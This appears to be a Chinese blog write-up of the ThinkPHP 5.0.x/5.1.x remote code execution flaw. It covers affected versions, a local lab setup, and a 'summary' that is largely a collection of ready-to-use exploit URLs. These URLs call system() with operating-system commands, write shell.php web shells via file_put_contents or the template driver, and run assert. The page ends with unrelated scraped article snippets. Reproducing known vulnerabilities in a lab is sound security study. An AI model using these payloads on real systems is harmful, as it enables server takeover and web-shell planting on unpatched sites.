z1挂东南
z1挂东南

ThinkPHP——ThinkPHP 5.x远程代码执行

0x00目录

  • 漏洞简介
  • 影响版本
  • 复现前提
  • 复现环境
  • 复现过程
  • 总结
  • 参考链接

0x01漏洞简介

ThinkPHP 5.x版本存在远程代码执行漏洞,高危,可被getshell。

0x02 影响版本

5.0.x版本:5.0.8~5.0.23
5.1.x版本:5.1.29(本次使用5.1.0版本也复现成功)

0x03 复现前提

5.0.8~5.0.12版本不需要开启debug模式
5.0.13~5.0.23复现前要保证开启了debug模式(默认是关闭的)

0x04 复现环境

5.0.x环境使用5.0.22版本,环境使用docker进行搭建。
环境地址:https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce

5.1.x环境使用5.1.0版本。
环境源码下载地址:https://www.php.cn/xiazai/code/4475

0x05 复现过程

5.0.22版本:
payload:http://127.0.0.1/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
截图:

5.1.0版本:
payload:http://127.0.0.1/ThinkPHP5.1.0/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
截图:

0x06 总结

5.0.x PHP版本>=5.4

//payload:
http://127.0.0.1/index.php/?s=index/\\think\\template\driver\\file/write&cacheFile=zxc0.php&content=

http://127.0.0.1/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=

http://127.0.0.1/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'\'>zxc2.php

http://127.0.0.1/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://127.0.0.1/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

5.1.x PHP版本>5.5

//payload:
http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert

http://127.0.0.1/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

//写入文件
http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=操作系统命令

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

0x07 参考链接

1.thinkphp 5.x全版本任意代码执行分析全记录
2.ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
3.thinkphp5.0和5.1 rce poc总结
4.ThinkPHP 5.0 * 远程代码执行漏洞简略分析

你可能感兴趣的:(ThinkPHP——ThinkPHP 5.x远程代码执行)

  • python 优化IO和并发提高性能 贵哥的编程之路(热爱分享 为后来者) python
    一、任务量与执行效率的关系任务量和效率成反比:任务量越大,程序整体耗时越长,执行效率越低。程序执行效率=完成单位任务所需的时间。任务多、耗时长,效率自然低。二、如何提高程序执行效率?减少任务量只做必要的工作,减少无用或重复的任务。例如:数据预处理、过滤无效请求、合并重复操作等。提高并发量让多个任务“同时”进行(并发/并行),充分利用CPU和IO资源。例如:多线程/多进程/协程/异步IO等。减少单个
  • Git协作开发:feature分支、拉取最新并合并 GISer_Jinger 中大厂面试gitelasticsearch大数据
    以下是关于Git中feature分支操作的详细步骤和完整示例:1.创建并切换到新feature分支#从develop分支创建新特性分支gitcheckout-bfeature/new-featuredevelop#查看当前分支确认gitbranch2.开发并提交代码#编写代码后添加文件gitadd.#提交到本地分支gitcommit-m"完成用户认证功能"3.推送到远程仓库#首次推送需设置上游分支
  • vue中cdn方式引入和构建工具创建代码的不同 翻滚吧键盘 vuevue.jsjavascript前端
    你观察得非常准确,而且这个问题直击了现代JavaScript开发中两种不同模块化思想的核心。是的,你总结的完全正确。为什么会有const{createApp,ref}=Vue;和import{createApp,ref}from'vue';这两种不同的方式呢?答案在于代码的来源和作用域完全不同。我们用一个比喻来解释。方式一:CDN-公共广播系统你可以把使用CDN的方式,想象成在你的办公室里安装了一
  • IT人力驻场开发:企业客户的务实选择 哲科软件 大数据
    企业选择IT人力外包服务时,常面临一个现实问题:同样预算下,选择IT人力驻场开发还是IT人力远程协作?这个选择背后,其实是企业在算三笔账——成本是否可控、效率能否达标、风险是否兜底。尤其是业务复杂、系统关联多的企业,这三个问题直接决定IT投入能不能转化为实际价值。一、成本账:看得见的投入,算得清的支出企业最怕IT项目变成“无底洞”——前期报价低,后期追加不断。远程开发的成本黑箱就在于此:需求沟通靠
  • 精准定义 RediSearch 索引 Schema Hello.Reader 数据库缓存技术人工智能djangopython后端
    一、Schema基础概念索引(Index):对Redis中的Hash或JSON文档进行反向索引,以支持全文、标签、数值、地理、向量等多种查询模式。Schema:定义索引结构,包括哪些字段(fields/attributes)、字段类型、是否可排序、权重(relevanceweight)、过滤条件等。在执行FT.CREATE时,必须指定:数据类型:ONHASH或ONJSONKey前缀(可选):PRE
  • 自动化工具ansible,以及playbook剧本
    自动化工具ansible,以及playbook剧本这篇博客主要说的是,ansible,以及playbook和常用的模块首先先介绍ansibleansible是一个自动化的运维工具,基于python开发主要的功能,可以实现批量的部署程序,批量的执行命令ansible默认通过的是ssh的协议管理机器,无需配置任何服务,管理端部署好后就可以使用。应用的环境应用代码的自动化部署系统管路配置自动化支持持续交
  • Python中的分支结构 xiaojimao1 python开发语言Python中的分支结构
    文章目录前言一、顺序结构与选择结构1.顺序结构2、选择结构二、单分支、双分支与多分支1、单分支2、双分支3、多分支三、分支嵌套代码逻辑解释四、pass关键字总结前言在编程中,分支结构是一种重要的控制结构,它允许程序根据不同的条件执行不同的代码。Python中的分支结构主要包括顺序结构、选择结构,以及单分支、双分支、多分支和分支嵌套等多种形式。此外,pass关键字在分支结构中也有其独特的用途。本文将
  • OpenDataV:开源 拖拽式 低代码数据可视化开发平台 ❀͜͡傀儡师 低代码信息可视化
    OpenDataV是一个拖拽式、#低代码数据#可视化开发平台。它允许用户通过拖拽组件到画布上,快速搭建各种炫酷的数据可视化大屏。不仅内置了丰富的组件库,还支持用户开发自己的组件并将其接入平台,从而满足多样化的业务需求。GitHub:https://github.com/AnsGoo/openDataV官方文档:https://ansgoo.github.io/docs/项目特性:拖拽式操作简单易用
  • Java内存区域划分及各区域作用
    Java虚拟机内存区域示意图:各分区都有什么特点,他们的作用是什么呢?1.程序计数器(ProgramCounterRegister)线程私有。程序计数器是一块较小的空间,它可以看做是当前线程所执行的字节码的行号指示器。2.Java虚拟机栈线程私有。Java虚拟机栈的生命周期与线程相同。虚拟机栈描述的是Java方法执行的内存模型:每个方法在执行的同时都会创建一个栈帧(StackFrame)用于存储局
  • 使用numpy或pytorch校验两个张量是否相等
    文章目录1、numpy2、pytorch做算法过程中,如果涉及到模型落地,那必然会将原始的深度学习的框架训练好的模型转换成目标硬件模型的格式,如onnx,tensorrt,openvino,tflite;那么就有对比不同格式模型输出的一致性,从而判断模型转换是否成功。1、numpy用到的核心代码就一行,就是:importnumpyasnpnp.testing.assert_allclose(act
  • Java内存区域(运行时数据区域)怎么划分的?
    1、Java内存区域(运行时数据区域)怎么划分的?程序计数器,Java虚拟机栈,本地方法栈,堆,方法区2、线程私用的部分(程序计数器,Java虚拟机栈,本地方法栈)程序计数器程序计数器存储了当前线程正在执行的字节码指令的地址(如果是当前执行的是Native方法,那么计数器为空),字节码解释器就是通过改变计数器的值来选取下一条需要执行的字节码指令。程序计数器是线程私有的,便于各个线程切换后,可以恢复
  • 机器学习笔记:MATLAB实践 techDM 机器学习笔记matlabMatlab
    在机器学习领域,MATLAB是一种功能强大且广泛使用的工具,它提供了许多内置函数和工具箱,方便开发者进行各种机器学习任务。本文将介绍一些常见的机器学习任务,并提供相应的MATLAB源代码示例。数据预处理在进行机器学习之前,通常需要对原始数据进行预处理。这包括数据清洗、特征选择、特征缩放和数据划分等步骤。%导入数据data=readmatrix('data.csv');%数据清洗cleaned_da
  • Augment code + axure 一键生成前端代码 人工智能前端
    上一篇文章我们讲了怎么通过Augmentcode+FigmaMCP生成前端代码,同时我也用了cursor,做了简单对比,结果如下:cursor+FigmaMCP速度快。可以导出Figma文件中的图标到项目中。整体还原度不咋地。对话式,会不断询问。Augmentcode+FigmaMCP速度慢。还原度高。基本不需要手动干预。访问项目整体性好,能检测到项目是否已经配置依赖等等。今天我们同样使用Augm
  • 50.第二阶段x64游戏实战-代码实现特征码定位 计算机王 逆向学习x64游戏反游戏外挂c++汇编游戏攻防特征码搜索
    免责声明:内容仅供学习参考,请合法利用知识,禁止进行违法犯罪活动!本次游戏没法给内容参考于:微尘网络安全上一个内容:49.第二阶段x64游戏实战-封包-代码实现自动登录现在找了很多基址了,但是游戏一更新,代码就会有变化,然后之前找的基址就没法用了,有得重新找,这是一个体力活,为了避免重新找就可以使用特征码进行定位,特征码定位也不是绝对的,可能需要多个版本才能让它不出错,如果特征代码进行了改动也还是
  • JavaScript性能优化实战:表格控件高效开发指南 javascript
    引言在现代Web应用开发中,电子表格功能已成为数据分析、报表展示等场景的核心需求。SpreadJS作为一款高性能的纯前端电子表格控件,能够完美兼容Excel文件格式,支持百万级数据量和复杂公式计算。然而随着数据规模的增长和业务逻辑的复杂化,性能优化成为开发者必须面对的挑战。本文将深入剖析几种SpreadJS性能优化技巧,通过实际案例和代码演示,帮助开发者构建响应迅速、用户体验优异的电子表格应用。正
  • Excel高效转Json工具类详解 你一身傲骨怎能输 游戏工具链exceljson
    文章摘要该工具类提供Excel到Json的转换功能,主要包含:ExcelToJsonToolEditor:核心编辑器类,处理Excel批量/单表转换、文件路径操作类型定义:TypeValue存储字段信息,JsonKeyType标识键类型转换流程:读取Excel→生成Json→自动创建对应C#配置类代码扩展性:支持指定表转换、错误处理、代码模板化生成关键方法:DoXlsxToJson处理单表转换,G
  • 游戏配置表导出工具深度解析 你一身傲骨怎能输 游戏工具链游戏
    文章摘要TableExportTool是一个用于表格数据导出的工具,主要包含表格读取、数据解析、导出和代码生成四大模块。它支持读取Excel/CSV文件,解析字段和类型后转换为JSON、二进制、Lua等多种格式,并自动生成C#、Lua等数据结构代码。工具还提供Unity集成功能,支持一键导出、Asset生成和热更新。核心流程包括读取表头、类型校验、数据组装和导出,通过NPOI/EPPlus实现表格
  • MapReduce分布式计算框架:从原理到实战 AI妈妈手把手 mapreduce前端大数据分布式计算python人工智能
    大家好!今天我们来聊聊大数据处理领域的一个重要框架——MapReduce。作为Google提出的经典分布式计算模型,MapReduce极大地简化了海量数据的处理流程。无论你是大数据新手还是有一定经验的开发者,这篇文章都会让你对MapReduce有更深入的理解。我们还会通过实际代码示例来展示它的强大功能!一、MapReduce是什么?想象你有一个装满10亿本书的图书馆,现在需要统计所有书中"大数据"
  • 接口幂等性 重生之我又是程序员 python数据库python并发乐观锁幂等性
    目录什么是接口幂等性场景一:唯一索引保证幂等实现思路表结构设计场景二:乐观锁控制并发修改实现思路表结构设计代码演示什么是接口幂等性接口幂等性指:无论调用多少次接口,产生的效果都是一样的,不会因为多次调用而导致副作用的叠加。换句话说:调用一次和调用多次的结果相同,系统状态不变。通常来说,实现接口幂等性的常见方法主要有这两种:1、唯一索引保证幂等给关键业务字段(比如订单号、请求ID、用户ID+操作类型
  • CppCon 2018 学习:From Metaprogramming Tricks to Elegance
    #这段内容是VincentReverdy在CppCon2018演讲的一部分,核心主题是:这场演讲的核心问题是:如何在C++17中提高代码的通用性(Genericity),而不牺牲代码的可读性与简洁性?具体要解决的问题是:你希望写出既通用又可维护的模板代码。换句话说,你希望能像这样思考和写代码:如果满足某个条件,就执行这个函数:if(some_condition){do_this();}让编译器自动
  • CppCon 2018 学习:A Semi Compile/Run-time Map with (Nearly) Zero Overhead Looup 虾球xz CppCon学习开发语言c++
    介绍一个C++和Java之间桥接(Bridge)系统的示例代码,它说明了如何在C++中调用Java类(如java.io.InputStream)的方法。下面是详细解读:一、内容来源说明《C++↔JavaBridge》目的:演示如何通过桥接层让C++直接调用Java方法(JNI背后封装)二、代码结构解读classInputStream//java.io.InputStream{public:inli
  • LoRA微调详解:如何为AIGC模型节省90%显存 SuperAGI2025 AI大模型应用开发宝典AIGCai
    LoRA微调详解:如何为AIGC模型节省90%显存关键词:LoRA、低秩适应、AIGC模型、参数高效微调、显存优化摘要:在AIGC(人工智能生成内容)领域,大模型(如GPT-3、LLaMA、StableDiffusion)的微调需要消耗海量显存,普通用户或企业难以负担。本文将深入解析LoRA(Low-RankAdaptation,低秩适应)这一参数高效微调技术,通过生活类比、数学原理、代码实战和应
  • JAVA内存区域划分 weixin_44612246 java开发语言redis
    根据《JAVA虚拟机规范》的规定,JAVA虚拟机在执行JAVA程序的过程中会把内存划分为不同的数据区域。不同类型的数据会存储在不同的区域,理解JAVA内存区域的工作细节对理解JAVA多线程、线程安全性有着重要意义。注意,JAVA内存区域的划分与我们常说的java内存模型JMM(JavaMemeryModel)是两个互不交叉的维度的概念,两者没有任何关系。JMM主要是将主内存和工作内存的关系、数据从
  • 【字节跳动】数据挖掘面试题0003:有一个文件,每一行是一个数字,如何用 MapReduce 进行排序和求每个用户每个页面停留时间
    MapReduce是一种适合处理大规模数据的分布式计算框架,其核心思想是将计算任务分解为Map(映射)和Reduce(归约)两个阶段。对文件中的数字进行排序,可以利用MapReduce的特性来实现。要使用MapReduce对文件中的数字进行排序,需要实现一个MapReduce作业,将数字作为键处理,利用Hadoop的默认排序机制对键进行排序。以下是实现步骤和示例代码:文章大纲题目一:有一个文件,每
  • 自动驾驶行业向端到端架构转型 未来创世纪 自动驾驶自动驾驶架构人工智能
    一、效能革命消除信息损耗与延迟传统模块化架构的流程是感知、决策、规划、控制这四个环节串联。例如,在一个自动驾驶汽车行驶过程中,感知模块先识别出前方有障碍物,将信息传递给决策模块,决策模块再决定是刹车还是变道,接着规划模块规划具体的行驶路径,最后控制模块执行操作。然而,在这个过程中,每个模块之间的接口会导致信息损失。比如,感知模块可能只能传递有限的关于障碍物的信息(如距离、速度等几个关键参数),而一
  • vue使用scrollreveal库 数字浪儿 vuevue.js前端javascript
    vue项目安装scrollrevealnpminstallscrollreveal推荐使用cnpminstallscrollreveal代码展示如下:HelloWorldHelloWorldHelloWorldHelloWorldHelloWorldHelloWorldimportScrollRevealfrom"scrollreveal";exportdefault{name:"App",dat
  • 使用c++编写一段人脸识别眨眼检测的代码 语嫣凝冰 c++opencv计算机视觉图像处理开发语言
    我可以给你一些大致的步骤:使用摄像头或图像文件获取视频帧。使用人脸检测算法检测视频帧中的人脸。对检测到的人脸进行眼睛检测。判断眼睛是否闭合,如果是则认为该人在眨眼。以下是一段使用OpenCV库编写的C代码示例:```#include#include#include#includeusingnamespacestd;usingnamespacecv;intmain(){//使用摄像头获取视频帧Vid
  • 原生html页面弹窗_html 页面弹窗 weixin_39609483 原生html页面弹窗
    第一种:alertalert("hello!")第二种:window.confirm()A:弹出窗口returntrue;}else{//alert("取消");returnfalse;}第三种:promptprompt方法也将显示一个模式消息框。用户在继续操作之前必须先关闭该消息框vartheResponse=window.prompt("欢迎?","请在此输入您的姓名。");页面代码测试fun
  • 深入理解 Spring 单元测试:@SpringBootTest、@Value 注入、@MockBean 使用实战与陷阱 drebander springspring单元测试
    Spring是目前最流行的Java企业级开发框架之一,而良好的单元测试是高质量代码的重要保障。尤其在实际开发中,我们经常会碰到诸如@Autowired空指针、Nacos配置项@Value注入失败、Mapper测试困难等问题。本文将围绕Spring单元测试的完整体系,结合以下关键要点进行讲解:@SpringBootTest的作用与最佳实践@Autowired注入空指针的常见原因与解决@Value注入
  • MyBatis架构原理解析:核心对象与执行流程深度剖析
    一、开篇:理解MyBatis的核心价值在当今Java持久层框架生态中,MyBatis凭借其灵活的SQL控制能力和简洁的ORM实现成为企业级应用的首选。与JPA的全自动ORM不同,MyBatis采用半自动化映射理念,在保持SQL灵活性的同时,通过智能映射减少70%的JDBC样板代码。开发者直接编写SQLMyBatis核心引擎自动参数绑定结果集映射事务管理JDBC本文将深入剖析MyBatis的架构核心
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他